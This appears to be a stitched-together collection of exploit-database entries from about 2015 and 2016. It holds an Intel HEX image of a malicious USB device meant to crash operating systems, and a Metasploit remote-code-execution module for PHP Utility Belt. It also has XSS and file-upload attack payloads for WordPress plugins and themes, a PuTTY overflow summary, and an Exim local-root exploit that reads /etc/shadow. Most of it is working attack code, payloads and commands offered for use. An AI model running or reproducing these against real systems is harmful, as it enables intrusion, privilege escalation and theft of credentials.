:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:1014240000000040820500000001010203010902DE
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Utility Belt Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in PHP Utility Belt,
which is a set of tools for PHP developers and should not be installed in a
production environment, since this application runs arbitrary PHP code as an
intended functionality.
},
'Author' =>
[
'WICS', # initial discovery
'Jay Turla' # msf
],
'References' =>
[
['EDB', '38901'],
['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
],
'DisclosureDate' => 'Aug 12 2015',
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false,
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'Targets' =>
[
['PHP Utility Belt', {}]
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
], self.class)
end
def check
txt = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{txt};")
if res && res.body.include?(txt)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
http_send_command(payload.encoded)
end
def http_send_command(cmd)
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'code' => cmd
}
)
end
end
* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497
Technical details:
Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
if(isset($_GET['initer'])){
$initer = $_GET['initer'];
}
Line 27 (unsanitized output):
<?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------
Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
if(isset($_GET['initer'])){
$initer = $_GET['initer'];
}
Line 27 (unsanitized output):
<?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------
Unauthenticated CSRF & XSS:
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b
Line 25 & 35 (unsanitized input & direct output):
$w = $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'
* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x
Description
================================================================================
The Beauty Premium theme contains a contact form that is vulnerable to CSRF
and File Upload vulnerability in the sendmail.php file. The file attachment
gets uploaded to the wordpress upload directory and it is not sanitized,
allowing attackers to upload harmful code.
PoC
================================================================================
Google Dork inurl:themes/beauty-premium/ or detect via WPScan:
<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test</textarea>
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" /> </li>
</form>
You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.
Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
Author: <github.com/tintinweb>
Date: Feb 20th, 2016
Name: putty
Vendor: sgtatham - http://www.chiark.greenend.org.uk/~sgtatham/putty/
Version: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s): win/nix
Technology: c
Vuln Classes: stack buffer overwrite (CWE-121)
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-2563
Summary
The putty SCP command-line utility (pscp) is missing a bounds-check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client- application potentially leading to remote code execution.
PoC attached. patch attached.
Besides that, two minor issues have been reported in putty packet handling:
DoS condition in the parsing of SSH-Strings that lead to a nullptr read. (connect putty to poc.py and type x11exploit to trigger one of multiple occurrence of a crash, also works with x11forwarding disabled in putty)
DoS condition in the handling of unrequested forwarded-tcpip channels open requests that lead to a nullptr read. (connect putty to poc.py and type forwardedtcpipcrash to trigger crash)
Details
The vulnerable code is located in pscp.c [4] line 1498 (HEAD) and is based on an unbound sscanf string format descriptor storing an arbitrary length string in a 40byte fixed size stack buffer sizestr[40].
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39551.zip
=============================================
- Advisory release date: 10.03.2016
- Created by: Dawid Golunski
- Severity: High/Critical
=============================================
I. VULNERABILITY
-------------------------
Exim < 4.86.2 Local Root Privilege Escalation Exploit
II. BACKGROUND
-------------------------
"Exim is a message transfer agent (MTA) developed at the University of
Cambridge for use on Unix systems connected to the Internet. It is freely
available under the terms of the GNU General Public Licence. In style it is
similar to Smail 3, but its facilities are more general. There is a great
deal of flexibility in the way mail can be routed, and there are extensive
facilities for checking incoming mail. Exim can be installed in place of
Sendmail, although the configuration of Exim is quite different."
http://www.exim.org/
III. INTRODUCTION
-------------------------
When Exim installation has been compiled with Perl support and contains a
perl_startup configuration variable it can be exploited by malicious local
attackers to gain root privileges.
IV. DESCRIPTION
-------------------------
The vulnerability stems from Exim in versions below 4.86.2 not performing
sanitization of the environment before loading a perl script defined
with perl_startup setting in exim config.
perl_startup is usually used to load various helper scripts such as
mail filters, gray listing scripts, mail virus scanners etc.
For the option to be supported, exim must have been compiled with Perl
support, which can be verified with:
[dawid@centos7 ~]$ exim -bV -v | grep i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL
Content_Scanning DKIM Old_Demime PRDR OCSP
To perform the attack, attacker can take advantage of the exim's sendmail
interface which links to an exim binary that has an SUID bit set on it by
default as we can see below:
[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim
lrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim
[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim
Normally, when exim sendmail interface starts up, it drops its root
privileges before giving control to the user (i.e entering mail contents for
sending etc), however an attacker can make use of the following command line
parameter which is available to all users:
-ps This option applies when an embedded Perl interpreter is linked with
Exim. It overrides the setting of the perl_at_start option, forcing the
starting of the interpreter to occur as soon as Exim is started.
As we can see from the documentation at:
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
the perl_at_start option does the following:
"Setting perl_at_start (a boolean option) in the configuration requests a
startup when Exim is entered."
Therefore it is possible to force the execution of the perl_startup script
defined in the Exim's main config before exim drops its root privileges.
To exploit this setting and gain the effective root privilege of the SUID binary,
attackers can inject PERL5OPT perl environment variable, which does not get
cleaned by affected versions of Exim.
As per perl documentation, the environment variable allows to set perl command-line
options (switches). Switches in this variable are treated as if they were on every
Perl command line.
There are several interesting perl switches that that could be set by attackers to
trigger code execution.
One of these is -d switch which forces perl to enter an interactive debug mode
in which it is possible to take control of the perl application.
An example proof of concept exploit using the -d switch can be found below.
V. PROOF OF CONCEPT ROOT EXPLOIT
-------------------------
[dawid@centos7 ~]$ head /etc/exim/exim.conf
######################################################################
# Runtime configuration file for Exim #
######################################################################
# Custom filtering via perl
perl_startup = do '/usr/share/exim4/exigrey.pl'
[dawid@centos7 ~]$ exim -bV -v | grep -i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP
[dawid@centos7 ~]$ PERL5OPT="-d/dev/null" /usr/sbin/sendmail.exim -ps victim@localhost
Loading DB routines from perl5db.pl version 1.37
Editor support available.
Enter h or 'h h' for help, or 'man perldebug' for more help.
Debugged program terminated. Use q to quit or R to restart,
use o inhibit_exit to avoid stopping after program termination,
h q, h R or h o to get additional info.
DB<1> p system("id");
uid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
0
DB<2> p system("head /etc/shadow");
root:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7::
[...]
VI. BUSINESS IMPACT
-------------------------
This vulnerability could be exploited by attackers who have local access to the
system to escalate their privileges to root which would allow them to fully
compromise the system.
VII. SYSTEMS AFFECTED
-------------------------
Exim versions before the latest patched version of Exim 4.86.2 are affected by
this vulnerability, if Exim was compiled with Perl support and the main
configuration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains
a perl_startup option e.g:
perl_startup = do '/usr/share/exim4/exigrey.pl'
It is important to note that the file does not necessarily have to exist
to exploit the vulnerability. Although the path must be specified.
VIII. SOLUTION
-------------------------
Update to Exim 4.86.2 which contains the official patch that fixes the
environment sanitization issues.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt
http://www.exim.org/
http://www.exim.org/static/doc/CVE-2016-1531.txt
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
https://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f
CVE-2016-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531
X. ADVISORY CREATED BY
-------------------------
This advisory has been created by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
March 10th, 2016: Advisory released
March 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.